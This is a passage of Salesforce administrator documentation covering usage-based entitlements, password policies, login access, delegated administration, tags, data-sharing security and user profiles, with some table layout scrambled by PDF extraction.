Other entitlements are not persistent; these work like credit. Your organization can use up to the amount allowed of that
entitlement each month. The start and end of the month is determined by your contract, rather than following a calendar
month. For example, if your company purchases 50 monthly logins for a Partner Community, on January 15 your organization
has a pool of 50 logins. Each time someone logs in, one login is used up. On February 15, no matter how many you used in
the previous month, the pool is refreshed and 50 logins are available through March 14.

Note:  If your organization has multiple contracts affecting the same resource, you will still only see one row for that
entitlement, but the data in that row will reflect your combined contracts. In this case, Start Date reflects the
earliest start date among those contracts, and End Date reflects the latest end date among those contracts.
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Like feature licenses, usage-based entitlements don’t limit what you can do in Salesforce; they add to your functionality. If
your usage exceeds the monthly allowance, salesforce.com will contact you to discuss additions to your contract.

See Also:
Viewing Usage-based Entitlements (BETA)
Usage-based Entitlement Fields (BETA)
Company Information Overview
Viewing and Managing Users

Viewing Usage-based Entitlements (BETA)
Look at your company’s usage-based entitlements to know which monthly resources your organization is entitled to.

Available in: Enterprise and Unlimited editions

User Permissions Needed

“View Setup and Configuration”To view usage-based entitlements:

1. From Setup, click Company Profile > Company Information.
2. At the bottom of the Company Information page, view the Usage-Based Entitlements related list.

See Also:
Usage-based Entitlements Overview (BETA)
Usage-based Entitlements Overview (BETA)
Usage-based Entitlement Fields (BETA)

Usage-based Entitlement Fields (BETA)

Available in: Enterprise and Unlimited editions

The Usage-based Entitlements related list displays the following information. These fields aren’t editable, and they are only
visible if your organization is entitled to a monthly resource.

DescriptionColumn name

What your company can use.Resource
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DescriptionColumn name

Day your contract begins.Start Date

Note:  If you have multiple contracts affecting this
resource, this field reflects the earliest start date
among your contracts.

Day your contract ends.End Date

Note:  If you have multiple contracts affecting this
resource, this field reflects the latest end date among
your contracts.

Amount of a resource that your organization can use each
month. The month begins on your Start Date.

Monthly Allowance

For more information about resources your organization is entitled to, contact salesforce.com.

See Also:
Usage-based Entitlements Overview (BETA)
Usage-based Entitlements Overview (BETA)
Viewing Usage-based Entitlements (BETA)

About Passwords
Password policies available in: All Editions

User Permissions Needed

“Manage Users”To set password policies:

“Reset User Passwords and Unlock Users”To reset user passwords and unlock users:

There are several settings you can configure to ensure that your users’ passwords are strong and secure:

• Password policies—set various password and login policies, such as specifying an amount of time before all users’ passwords
expire, the level of complexity required for passwords, and so on. See Setting Password Policies on page 309.

• User password expiration—expire the passwords for all the users in your organization, except for users with “Password
Never Expires” permission. See Expiring Passwords on page 312.

• User password resets—reset the password for specified users. See Resetting Passwords on page 311.

• Login attempts and lockout periods—if a user is locked out of Salesforce due to too many failed login attempts, you can
unlock them. See Editing Users on page 281.
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Password Requirements
A password cannot contain your User Name and cannot match your first or last name.

For all editions, a new organization has the following default password requirements:

• A password must contain at least eight characters.
• A password must contain at least one alphabetic character and one number.
• The answer to the question posed if you forget your password cannot contain your password.
• The last three passwords are remembered and cannot be reused when you are changing your password.

The password policies, including these defaults, can be updated for all editions except for Personal Edition.

Setting Password Policies

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To set password policies:

For your organization’s security, you can set various password and login policies.

Note:

User passwords cannot exceed 16,000 bytes.

Logins are limited to 3,600 per hour per user. This limit applies to organizations created after Summer ’08.

1. From Setup, click Security Controls > Password Policies.
2. Customize the password settings.

DescriptionField

The length of time until all user passwords expire and must
be changed. Users with the “Password Never Expires”

User passwords expire in

permission are not affected by this setting. The default is 90
days. This setting is not available for Self-Service portals.

Save users’ previous passwords so that they must always reset
their password to a new, unique password. Password history

Enforce password history

is not saved until you set this value. The default is 3
passwords remembered. You cannot select No
passwords remembered unless you select Never
expires for the User passwords expire in field.
This setting is not available for Self-Service portals.

The minimum number of characters required for a password.
When you set this value, existing users aren’t affected until

Minimum password length
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DescriptionField

the next time they change their passwords. The default is 8
characters.

The requirement for which types of characters must be used
in a user’s password.

Complexity levels:

Password complexity requirement

• No restriction—allows any password value and is
the least secure option.

• Must mix alpha and numeric—requires at least
one alphabetic character and one number. This is the
default.

• Must mix alpha, numeric, and special
characters—requires at least one alphabetic character,
one number, and one of the following characters: ! #
$ % - _ = + < >.

The values are Cannot contain password, meaning
that the answer to the password hint question cannot contain

Password question requirement

the password itself; or None, the default, for no restrictions
on the answer. The user’s answer to the password hint
question is required. This setting is not available for
Self-Service portals, Customer Portals, or partner portals.

The number of login failures allowed for a user before they
become locked out. This setting is not available for
Self-Service portals.

Maximum invalid login attempts

The duration of the login lockout. The default is 15 minutes.
This setting is not available for Self-Service portals.

Lockout effective period

Note:  If users are locked out, they must wait until
the lockout period expires. Alternatively, a user with
the “Reset Passwords and Unlock Users” permission
can unlock them from Setup by clicking Manage
Users > Users, selecting the user, then clicking
Unlock. This button is only available when a user
is locked out.

3. Customize the forgotten password and locked account assistance information.

Note: This setting is not available for Self-Service portals, Customer Portals, or partner portals.
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DescriptionField

When set, this custom message appears in the Account
Lockout email and at the bottom of the Confirm Identity

Message

screen for users resetting their passwords. You can customize
it with the name of your internal help desk or a system
administrator. For the lockout email, the message only
appears for accounts that need an administrator to reset
them. Lockouts due to time restrictions get a different system
email message.

If set, this link displays with the text defined in the Message
field. In the Account Lockout email, the URL displays just

Help link

as it is typed into the Help link field, so the user can see
where the link takes them. This is a security feature because
the user is not within a Salesforce organization.

On the Confirm Identity password screen, the Help link
URL combines with the text in the Message field to make
a clickable link. Security isn’t an issue since the user is in a
Salesforce organization when changing passwords.

Valid protocols:

• http
• https
• mailto:

4. Specify an alternative home page for users with the “API Only User” permission. After completing user management tasks
such as resetting a password, API-only users are redirected to the URL specified here, rather than to the login page.

5. Click Save.

See Also:
About Passwords

Resetting Passwords

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Reset User Passwords and Unlock Users”To reset passwords:

To reset a user’s password:
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1. From Setup, click Manage Users > Users.
2. Select the checkbox next to the user’s name. Optionally, to change the passwords for all currently displayed users, check

the box in the column header to select all rows.
3. Click Reset Password to have a new password emailed to the user.

A password created this way doesn’t expire, but users must change the password the first time they log in.

Tips on Resetting Passwords

Consider the following when resetting passwords:

• Only an administrator can reset Single Sign-On user passwords; Single Sign-On users cannot reset their own passwords.
• Resetting users’ passwords might cause them to activate their computers to successfully log in to Salesforce.
• Resetting locked-out users’ passwords automatically unlocks their accounts as well.
• When users lose their passwords, they can click the Forgot your password? link on a failed login page to receive a new

password via email. They must correctly answer a previously defined security question before they can reset their password
and log in. You can customize part of the page where the user answers the security question with additional information
about where to go to for help.

Note:  If the user has not defined a security question, or fails to answer correctly when trying to login, the password
is not reset.

See Also:
About Passwords

Expiring Passwords

Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To expire all passwords:

To expire passwords for all users, except those with the “Password Never Expires” permission:

1. From Setup, click Security Controls > Expire All Passwords.
2. Select Expire all user passwords.
3. Click Save.

The next time each user logs in, he or she will be prompted to reset his or her password.

Tips on Expiring Passwords

Consider the following when expiring passwords:

• After you expire passwords, users might need to activate their computers to successfully log in to Salesforce.
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• You can expire passwords for all users any time you want to enforce extra security for your organization.
• Expire all user passwords does not affect Self-Service portal users, because they are not direct Salesforce users.

See Also:
About Passwords

Controlling Login Access
Available in: All Editions

Granting administrator access available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To control login access policies:

1. From Setup, click Security Controls > Login Access Policies.
2. To allow administrators to log in as any user in the organization without first asking end-users to grant login access to

them, enable Administrators Can Log in as Any User. This option is only available if salesforce.com has enabled it for
your organization. To request this feature, contact salesforce.com.

3. To prevent users from granting access to a publisher (to comply with regulatory or privacy concerns, for example), click
Available to Administrators Only for that publisher.

4. Click Save.

Consider these implementation restrictions.

• Users cannot grant login access to managed packages that are licensed to your entire organization. Only administrators
with the “Manage Users” permission enabled on their profile can grant access to these publishers.

• Login access is only available for certain managed packages. If the package is not listed, it is not available for granting login
access.

See Also:
Logging In as Another User
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Logging In as Another User

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Modify All Data”To log in as another user who has granted you access:

To assist other users, administrators can log in to Salesforce as another user. Depending on your organization settings, individual
users may need to first grant login access to administrators.

To log in as another user:

1. From Setup, click Manage Users > Users.
2. Click the Login link next to the user name. This link is only available for users who have granted login access to an

administrator, or in organizations where administrators can log in as any user.
3. Click User’s Name > Logout to return to your administrator account.

See Also:
Controlling Login Access
Viewing and Managing Users

Delegating Administrative Duties
Available in: Enterprise, Unlimited, and Developer, and Database.com Editions

User Permissions Needed

“Customize Application”To delegate administration:

“View Setup and Configuration”To be a delegated administrator:

Use delegated administration to assign limited administrative privileges to selected non-administrator users in your organization.

Delegated administrators can perform the following tasks:

• Creating and editing users and resetting passwords for users in specified roles and all subordinate roles, including setting
quotas, creating default opportunity teams, and creating personal groups for those users

• Unlocking users

• Assigning users to specified profiles

• Logging in as a user who has granted login access to their administrator

• Managing custom objects created by an administrator
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For example, you may want to allow the manager of the Customer Support team to create and edit users in the Support
Manager role and all subordinate roles. This allows the administrator to focus on tasks other than managing users for every
department that uses Salesforce.

To create delegated groups, from Setup, click Security Controls > Delegated Administration, then click New.

To manage your delegated groups:

• Click Edit next to a group to modify it.

• Select a group and click Delete to remove it.

• Select a group and click Remove next to the user in the Delegated Administrators related list to remove a user from that
delegated group.

Note:  To delegate administration of particular objects, use object permissions, such as “View All” and “Modify All.”

See Also:
Defining Delegated Administrators
Delegating User Administration
Delegating Custom Object Administration

Defining Delegated Administrators

Available in: Enterprise, Unlimited, and Developer, and Database.com Editions

User Permissions Needed

“Customize Application”To delegate administration:

“View Setup and Configuration”To be a delegated administrator:

A delegated administration group is a group of users who have the same administrative privileges. These groups are not related
to public groups used for sharing. To define a delegated administration group:

1. From Setup, click Security Controls > Delegated Administration.
2. Click New.
3. Enter a group name.
4. To allow the users in this group to log in as users in the role hierarchy that they administer, select Enable Group for

Login Access. Depending on your organization settings, individual users may need to grant login access to allow their
administrators to log in as them.

5. Click Save.
6. To specify the users in this delegated group, in the Delegated Administrators related list, click Add.

7. Click  to find and add users to the group. The users must have the “View Setup and Configuration” permission.
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8. Click Save.

See Also:
Delegating Administrative Duties

Delegating User Administration

Available in: Enterprise, Unlimited, and Developer, and Database.com Editions

User Permissions Needed

“Customize Application”To delegate administration:

“View Setup and Configuration”To be a delegated administrator:

Enable delegated administrators to manage users in specified roles and all subordinate roles, assign specified profiles to those
users, and log in as users who have granted login access to administrators.

1. From Setup, click Security Controls > Delegated Administration.
2. Select the name of an existing delegated administration group.
3. Click Add in the User Administration related list.
4. Use the magnifying glass lookup icon to find and add roles. Delegated administrators can create and edit users in these

roles and all subordinated roles.
5. Click Save.
6. Click Add in the Assignable Profiles related list.
7. Use the magnifying glass lookup icon to find and add profiles. Delegated administrators can assign these profiles to the

users they create and edit. Note that profiles with the “Modify All Data” permission cannot be assigned by delegated
administrators.

Note:  If a user is a member of more than one delegated administration group, be aware that he or she can assign
any of the assignable profiles to any of the users in roles he or she can manage.

8. Click Save.
9. See Delegating Custom Object Administration on page 317 to specify what custom objects the delegated administrators

can manage.

To remove roles or profiles from the list of items the delegated administrators can use, click Remove next to the role or profile.

See Also:
Delegating Administrative Duties

316

Delegating Administrative DutiesManage Users



Delegating Custom Object Administration

Available in: Enterprise, Unlimited, and Developer, and Database.com Editions

User Permissions Needed

“Customize Application”To delegate administration:

“View Setup and Configuration”To be a delegated administrator:

Enable delegated administrators to manage custom objects that have been created by an administrator.

1. From Setup, click Security Controls > Delegated Administration.
2. Select the name of an existing delegated administration group.
3. From the detail page of the delegated administration group, click Add in the Custom Object Administration related list.
4. Use the magnifying glass lookup icon to find and add custom objects. Delegated administrators can customize nearly every

aspect of a custom object, including creating a custom tab for it.
5. Click Save. Click Save & More to add additional custom objects.

To remove a custom object from the list of items the delegated administrators can manage, click Remove next to the custom
object.

Notes on Delegated Administration of Custom Objects

• Delegated administrators can customize nearly every aspect of the custom object, including creating a custom tab for it.
However, they cannot create or modify relationships on the object or set organization-wide sharing defaults.

• Delegated administrators need to have access to custom objects if they need to access the merge fields on those objects
from formulas.

See Also:
Delegating Administrative Duties

Tags Settings
Tag settings available in: All Editions

User Permissions Needed

“Customize Application”To modify tag settings:

Administrators set up and manage personal and public tags by:
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• Enabling tags for accounts, activities, assets, campaigns, cases, contacts, contracts, dashboards, documents, events, leads,
notes, opportunities, reports, solutions, tasks, and any custom objects (except relationship group members)

• Adding tags to the sidebar for their users

• Deleting personal tags for deactivated users

Enabling Tags

Tag settings available in: All Editions

User Permissions Needed

“Customize Application”To modify tag settings:

1. From Setup, click Customize > Tags > Tag Settings.
2. Select Enable Personal Tags and Enable Public Tags to allow users to add personal and public tags to records.

Deselect both options to disable tags.
3. Specify which objects and page layouts should display tags in a tag section at the top of record detail pages. The tag section

is the only way that a user can add tags to a record.

For example, if you only select account page layouts, users in your organization can only tag account records. Additionally,
if you only select account page layouts for personal tags and not public tags, users can only tag account records with personal
tags.

4. Click Save.

Use these tips when enabling tags.

• When you enable tags, you can also add them to a page layout by editing the page layout directly.

• Search results and the Tags page don't display custom objects that don't have an associated tab, even if tags are enabled
for the custom object. If you want custom object records to appear in search results or on the Tags page, you must create
an associated tab. The tab doesn't have to be visible to users.

• Customer Portal users can't view the tags section of a page, even if it is included in a page layout.

• When Chatter is disabled, joined reports can’t be tagged.

See Also:
Tags Settings
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Adding Tags to the Sidebar

Tag settings available in: All Editions

User Permissions Needed

“Customize Application”To modify tag settings:

When you enable tags for your organization, you can add the Tags component to your users' sidebar. This component allows
users to navigate to the Tags page where they can browse, search, and manage their tags. It also lists each user's most recently
used tags. To add this component:

1. From Setup, click Customize > Home > Home Page Layouts.
2. Next to a home page layout that you want to modify, click Edit.
3. Select the Tags checkbox and click Next.
4. Arrange the Tags component on your page layout as desired, and click Save.

Tip: If you want the Tags component to appear on all pages and not just the Home tab, from Setup, click Customize
> User Interface, and select Show Custom Sidebar Components on All Pages.

See Also:
Tags Settings

Deleting Personal Tags for Deactivated Users

Personal Tag Cleanup available in: All Editions

User Permissions Needed

“Customize Application”To delete personal tags for deactivated users:

Your organization can have a maximum of 5,000,000 personal and public tags applied to records across all users. If your
organization is approaching this limit, you can delete personal tags for deactivated users.

1. From Setup, click Customize > Tags > Personal Tag Cleanup.
2. Select one or more deactivated users and click Delete.
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You can't restore personal tags after you delete them.

See Also:
Tags Settings

MANAGE USER ACCESS TO DATA

Securing Data Access
The available data management options vary according to which Salesforce Edition you have.

Choosing the data set that each user or group of users can see is one of the key decisions that affects data security. You need
to find a balance between limiting access to data, thereby limiting risk of stolen or misused data, versus the convenience of
data access for your users.

Note: Who Sees What: Overview (4:33 minutes)

Watch a demo on controlling access to and visibility of your data.

To enable users to do their job without exposing data that they do not need to see, Salesforce provides a flexible, layered sharing
design that allows you to expose different data sets to different sets of users.

• To specify the objects that users can access, you can assign permission sets and profiles.

• To specify the fields that users can access, you can use field-level security.

• To specify the individual records that users can view and edit, you can set your organization-wide sharing settings, define
a role hierarchy, and create sharing rules.

Tip:  When implementing security and sharing rules for your organization, make a table of the various types of users
in your organization. In the table, specify the level of access to data that each type of user needs for each object and
for fields and records within the object. You can refer to this table as you set up your security model.

The following describes these security and sharing settings:

Object-Level Security (Permission Sets and Profiles)

Object-level security—or object permissions—provide the bluntest way to control data. Using object permissions you
can prevent a user from seeing, creating, editing, or deleting any instance of a particular type of object, such as a lead or
opportunity. Object permissions let you hide whole tabs and objects from particular users, so that they don’t even know
that type of data exists.

You specify object permissions in permission sets and profiles. Permission sets and profiles are collections of settings and
permissions that determine what a user can do in the application, similar to a group in a Windows network, where all
of the members of the group have the same folder permissions and access to the same software.
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Profiles are typically defined by a user’s job function (for example, system administrator or sales representative). A profile
can be assigned to many users, but a user can be assigned to only one profile. You can use permission sets to grant
additional permissions and access settings to users. It’s easy to manage users’ permissions and access with permission
sets, because you can assign multiple permission sets to a single user.

Field-Level Security (Permission Sets and Profiles)

In some cases, you may want users to have access to an object, but limit their access to individual fields in that object.
Field-level security—or field permissions—control whether a user can see, edit, and delete the value for a particular field
on an object. They let you protect sensitive fields without having to hide the whole object from users. Field permissions
are also controlled in permission sets and profiles.

Unlike page layouts, which only control the visibility of fields on detail and edit pages, field permissions control the
visibility of fields in any part of the app, including related lists, list views, reports, and search results. To ensure that a
user can’t access a particular field, use field permissions. No other settings provide the same level of protection for a field.

Note: Field-level security doesn’t prevent searching on the values in a field. When search terms match on field
values protected by field-level security, the associated records are returned in the search results without the
protected fields and their values.

Record-Level Security (Sharing)

After setting object- and field-level access permissions, you may want to configure access settings for the actual records
themselves. Record-level security lets you give users access to some object records, but not others. Every record is owned
by a user or a queue. The owner has full access to the record. In a hierarchy, users higher in the hierarchy always have
the same access to users below them in the hierarchy. This access applies to records owned by users, as well as records
shared with them.

To specify record-level security, set your organization-wide sharing settings, define a hierarchy, and create sharing rules.
• Organization-wide sharing settings—The first step in record-level security is to determine the organization-wide

sharing settings for each object. Organization-wide sharing settings specify the default level of access users have to
each others’ records.

You use organization-wide sharing settings to lock down your data to the most restrictive level, and then use the
other record-level security and sharing tools to selectively give access to other users. For example, let’s say users have
object-level permissions to read and edit opportunities, and the organization-wide sharing setting is Read-Only. By
default, those users can read all opportunity records, but can’t edit any unless they own the record or are granted
additional permissions.

• Role hierarchy—Once you’ve specified organization-wide sharing settings, the first way you can give wider access to
records is with a role hierarchy. Similar to an organization chart, a role hierarchy represents a level of data access that
a user or group of users needs. The role hierarchy ensures that users higher in the hierarchy always have access to the
same data as people lower in their hierarchy, regardless of the organization-wide default settings. Role hierarchies
don’t have to match your organization chart exactly. Instead, each role in the hierarchy should represent a level of
data access that a user or group of users needs.

You can also use a territory hierarchy to share access to records. A territory hierarchy grants users access to records
based on criteria such as zip code, industry, revenue, or a custom field that is relevant to your business. For example,
you could create a territory hierarchy in which a user with the “North America” role has access to different data than
users with the “Canada” and “United States” roles.
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Note: Although it’s easy to confuse permission sets and profiles with roles, they control two very different
things. Permission sets and profiles control a user’s object and field access permissions. Roles primarily
control a user’s record-level access through role hierarchy and sharing rules.

• Sharing rules—Sharing rules let you make automatic exceptions to organization-wide sharing settings for particular
sets of users, to give them access to records they don’t own or can’t normally see. Sharing rules, like role hierarchies,
are only used to give additional users access to records—they can’t be stricter than your organization-wide default
settings.

• Manual sharing—Sometimes it’s impossible to define a consistent group of users who need access to a particular set
of records. In those situations, record owners can use manual sharing to give read and edit permissions to users who
would not have access to the record any other way. Although manual sharing isn’t automated like organization-wide
sharing settings, role hierarchies, or sharing rules, it gives record owners the flexibility to share particular records
with users that need to see them.

• Apex managed sharing—If sharing rules and manual sharing don’t give you the control you need, you can use Apex
managed sharing. Apex managed sharing allows developers to programmatically share custom objects. When you
use Apex managed sharing to share a custom object, only users with the “Modify All Data” permission can add or
change the sharing on the custom object's record, and the sharing access is maintained across record owner changes.

USER PERMISSIONS AND ACCESS

Overview of User Permissions and Access
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User permissions and access settings specify what users can do within an organization. For example, permissions determine a
user's ability to edit an object record, view the Setup menu, empty the organizational Recycle Bin, or reset a user's password.
Access settings determine other functions, such as access to Apex classes, app visibility, and the hours when users can log in.

Permissions and access settings are specified in user profiles and permission sets. Every user is assigned only one profile, but
can also have multiple permission sets.

When determining access for your users, it's a good idea to use profiles to assign the minimum permissions and access settings
for specific groups of users, then use permission sets to grant additional permissions.

Because you can assign many permission sets to users and permission sets are reusable, you can distribute access among more
logical groupings of users, regardless of their primary job function. For example, you can create a permission set that gives
read access to a custom object and assign it to a large group of users, and create another permission set that gives edit access
to the object and assign it to only a few users. You can assign these permission sets to various types of users, regardless of their
profiles.

The following table shows the types of permissions and access settings that are specified in profiles and permission sets. Some
profile settings aren't included in permission sets.
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In Permission Sets?In Profiles?Permission or Setting Type

Assigned apps

Tab settings

Record type assignments

Page layout assignments

Object permissions

Field permissions

User permissions (app and system)

Apex class access

Visualforce page access

Service provider access (if Salesforce is
enabled as an identity provider)

Desktop client access

Login hours

Login IP ranges

See Also:
User Profiles Overview
Permission Sets Overview
Revoking Permissions and Access

Revoking Permissions and Access

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

You can use profiles and permission sets to grant access, but not to deny access. Any permission granted from either a profile
or permission set is honored. For example, if “Transfer Record” isn't enabled in Jane Smith's profile, but is enabled in two of
her permission sets, she can transfer records regardless of whether she owns them. To revoke a permission, you must remove
all instances of the permission from the user. You can do this with the following actions—each has possible consequences.

ConsequenceAction

The permission or access setting is disabled for all other users
assigned to the profile or permission sets.

Disable a permission or remove an access setting in the profile
and any permission sets that are assigned to the user.
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ConsequenceAction

The user may lose other permissions or access settings
associated with the profile or permission sets.

If a permission or access setting is enabled in the user's profile,
assign a different profile to the user.

AND

If the permission or access setting is enabled in any permission
sets that are assigned to the user, remove the permission set
assignments from the user.

To resolve the consequence in either case, consider all possible options. For example, you can clone the assigned profile or any
assigned permission sets where the permission or access setting is enabled, disable the permission or access setting, and assign
the cloned profile or permission sets to the user. Another option is to create a base profile with the least number of permissions
and settings that represents the largest number of users possible, then create permission sets that layer additional access.

See Also:
Assigning Permission Sets
Creating Permission Sets
Overview of User Permissions and Access

User Profiles Overview
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

A profile contains user permissions and access settings that control what users can do within their organization.

Note: Who Sees What: Object Access (5:51 minutes)

Watch how you can grant users access to objects using profiles.

Depending on which profile user interface is enabled in your organization, you can:

• View and edit profiles in the enhanced profile user interface

• View and edit profiles in the original profile user interface

You can also use a list view to edit multiple profiles.

Profiles control:

• Which standard and custom apps users can view

• Which tabs users can view

• Which record types are available to users

• Which page layouts users see

• Object permissions that allow users to create, read, edit, and delete records

• Which fields within objects users can view and edit
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• Permissions that allow users to manage the system and apps within it

• Which Apex classes and Visualforce pages users can access

• Which desktop clients users can access

• The hours during which and IP addresses from which users can log in

• Which service providers users can access (if Salesforce is enabled as an identity provider)

In Contact Manager, Group, and Professional Edition organizations, you can assign standard profiles to your users, but you
can't view or edit the standard profiles or create custom profiles. In Enterprise, Unlimited, and Developer Edition organizations,
you can use standard profiles, or create, edit, and delete custom profiles. For standard profiles, only certain settings can be
changed.

Each standard or custom profile belongs to exactly one user license type.

See Also:
Standard Profiles
Viewing Profile Lists

Standard Profiles

The standard profiles available vary according to the Edition you have.

There are standard profiles in every organization. In Enterprise, Unlimited, and Developer Edition, you can use standard
profiles or create, edit, and delete custom profiles. In organizations where you can't create custom profiles (such as Contact
Manager, Group, and Professional Edition), you can assign standard profiles to your users, but you can't view or edit them.

Available PermissionsProfile Name

Can configure and customize the application. Has access to
all functionality that does not require an additional license.

System Administrator

For example, administrators cannot manage campaigns unless
they also have a Marketing User license. Can manage price
books and products. Can edit any quota, override forecasts,
and view any forecast.

Can use custom Force.com AppExchange apps developed in
your organization or installed from AppExchange. In addition,

Standard Platform User

can use core platform functionality such as accounts, contacts,
reports, dashboards, and custom tabs.

Can use one custom AppExchange app developed in your
organization or installed from AppExchange. The custom app

Standard Platform One App User

is limited to five tabs. In addition, can use core platform
functionality such as accounts, contacts, reports, dashboards,
and custom tabs.

Can create and edit most major types of records, run reports,
and view the organization's setup. Can view, but not manage,

Standard User
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Available PermissionsProfile Name

campaigns. Can create, but not review, solutions. Can edit
personal quota and override forecasts.

Can only log in via a partner portal.Partner User

Can only log in via a Customer Portal.High Volume Customer Portal

and

Authenticated Website

Both user licenses are high-volume portal users

Can only log in via a Customer Portal. Can view and edit data
they directly own or data owned by or shared with users below

Customer Portal User

them in the Customer Portal role hierarchy; and they can view
and edit cases where they are listed in the Contact Name
field.

Can only log in via a Customer Portal. Can view and edit data
they directly own or data owned by or shared with users below

Customer Portal Manager

them in the Customer Portal role hierarchy; and they can view
and edit cases where they are listed in the Contact Name
field.

Can review and publish solutions. Also has access to the same
functionality as the Standard User.

Solution Manager

Can manage campaigns, import leads, create letterheads, create
HTML email templates, manage public documents, and

Marketing User

update campaign history via the import wizards. Also has
access to the same functionality as the Standard User.

Can create, edit, activate, and approve contracts. This profile
can also delete contracts as long as they are not activated. Can
edit personal quota and override forecasts.

Contract Manager

Can view the organization's setup, run and export reports, and
view, but not edit, other records.

Read Only

Can only log in to Chatter. Can access all standard Chatter
people, profiles, groups, and files. Additionally, they can:

Chatter Only User

• View Salesforce accounts and contacts

• Use Salesforce CRM Content, Ideas, and Answers

• Modify up to ten custom objects

Note:  You must expose the tabs for the standard
Salesforce objects that the Chatter Only user profile
can access, as they are hidden by default for these
users.
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Available PermissionsProfile Name

Professional Edition organizations must have Profiles
enabled to perform these tasks. Contact your sales
representative for more information.

Only available with the Chatter Only user license.

For more information on Chatter Plus users, see Chatter Plus
Frequently Asked Questions.

Can only log in to Chatter. Can access all standard Chatter
people, profiles, groups, and files.

Only available with the Chatter Free user license.

Chatter Free User

Can only log into Chatter and access groups they've been
invited to and interact with members of those groups. Only
available with the Chatter External user license.

Chatter External User

Can only log in to Chatter. Can access all standard Chatter
people, profiles, groups, and files. Additionally, this user can:

Chatter Moderator User

• Activate and deactivate other Chatter Free users and
moderators

• Grant and revoke moderator privileges

• Delete posts and comments that they can see

Note: Changing a user's profile from Chatter
Moderator User to Chatter Free User removes
moderator privileges in Chatter.

Only available with the Chatter Free user license.

Can only log in to the Site.com app. Each Site.com Only user
also needs a Site.com Publisher feature license to create and

Site.com Only User

publish sites, or a Site.com Contributor feature license to edit
the site's content..

Additionally, this user can:

• Use one custom app with up to 20 custom objects

• Access the Content app, but not the Accounts and
Contacts objects

• Create unlimited custom tabs

Only available with the Site.com Only user license.

See Also:
User Profiles Overview
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Viewing Profile Lists

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The Customer Portal and partner portals are not available in Database.com

User Permissions Needed

“View Setup and Configuration”To view profiles, and print profile lists:

“Manage Users”To delete profile list views:

“Manage Users”

AND

“Customize Application”

To delete custom profiles:

A profile contains user permissions and access settings that control what users can do within their organization. To view the
profiles in your organization, from Setup, click Manage Users > Profiles.

Viewing Enhanced Profile Lists

If enhanced profile list views are enabled for your organization, you can use additional tools to customize, navigate, manage,
and print profile lists.

• Show a filtered list of profiles by selecting a view from the drop-down list.
• Delete a view by selecting it from the drop-down list and clicking Delete.
• Create a list view or edit an existing view.
• Create a profile.
• Print the list view by clicking .
•

Refresh the list view after creating or editing a view by clicking .
• Edit permissions directly in the list view.
• View or edit a profile by clicking its name.
• Delete a custom profile by clicking Del next to its name.

Viewing the Basic Profile List

• Create a profile.
• View or edit a profile by clicking its name.
• Delete a custom profile by clicking Del next to its name.

See Also:
Editing Multiple Profiles with Profile List Views
User Profiles Overview
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Creating and Editing Profile List Views

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To create, edit, and delete profile list views:

If enhanced profile list views are enabled for your organization, you can create profile list views to show a set of profiles with
the fields you choose. For example, you could create a list view of all profiles in which “Modify All Data” is enabled.

1. In the Profiles page, click Create New View, or select a view and click Edit.
2. Enter the view name.
3. Under Specify Filter Criteria, specify the conditions that the list items must match, such as Modify All Data equals

True.

a. Type a setting name, or click the lookup icon  to search for and select the setting you want.
b. Choose a filter operator.
c. Enter the value that you want to match.
d. To specify another filter condition, click Add New. You can specify up to 25 filter condition rows.

To remove a filter condition row and clear its values, click the remove row icon .

4. Under Select Columns to Display, specify the profile settings that you want to appear as columns in the list view.

a. From the Search drop-down list, select the type of setting you want to search for.
b. Enter part or all of a word in the setting you want to add and click Find.

Note:  If the search finds more than 500 values, no results appear. Use the preceding steps to refine your search
criteria and show fewer results.

c. To add or remove columns, select one or more column names and click the Add or Remove arrow.
d. Use the Top, Up, Down, and Bottom arrows to arrange the columns in the sequence you want.

You can add up to 15 columns in a single list view.

5. Click Save, or if you're cloning an existing view, rename it and click Save As.

See Also:
Editing Multiple Profiles with Profile List Views
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Editing Multiple Profiles with Profile List Views

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To edit multiple profiles from the list view:

If enhanced profile list views are enabled for your organization, you can change permissions in up to 200 profiles directly from
the list view, without accessing individual profile pages. Editable cells display a pencil icon ( ) when you hover over the cell,
while non-editable cells display a lock icon ( ). In some cases, such as in standard profiles, the pencil icon appears but the
setting is not actually editable.

Warning:  Use care when editing profiles with this method. Because profiles affect a user's fundamental access,
making mass changes may have a widespread effect on users in your organization.

To change permissions in one or more profiles:

1. Select or create a list view that includes the profiles and permissions you want to edit.
2. To edit multiple profiles, select the checkbox next to each profile you want to edit. If you select profiles on multiple pages,

Salesforce remembers which profiles are selected.
3. Double-click the permission you want to edit. For multiple profiles, double-click the permission in any of the selected

profiles.
4. In the dialog box that appears, enable or disable the permission. In some cases, changing a permission may also change

other permissions. For example, if “Customize Application” and “View Setup and Configuration” are disabled and you
enable “Customize Application,” then “View Setup and Configuration” is also enabled. In this case, the dialog box lists
the affected permissions.

5. To change multiple profiles, select All n selected records (where n is the number of profiles you selected).
6. Click Save.

Note:

• For standard profiles, inline editing is available only for the “Single Sign-On” and “Affected By Divisions”
permissions.

• If you edit multiple profiles, only those profiles that support the permission you are changing will change. For
example, if you use inline editing to add “Modify All Data” to multiple profiles, but because of its user license the
profile doesn't have “Modify All Data,” the profile won't change.

If any errors occur, an error message appears, listing each profile in error and a description of the error. Click the profile name
to open the profile detail page. The profiles you've clicked appear in the error window in gray, strike-through text.

Note: To view the error console, you must have pop-up blockers disabled for the Salesforce domain.
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Any changes you make are recorded in the setup audit trail.

See Also:
User Profiles Overview

Cloning Profiles

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To create profiles:

Tip:  If you’re cloning a profile to enable certain permissions or access settings for one or more users, you might be
able to enable those permissions or access settings using permission sets. For more information, see Permission Sets
Overview.

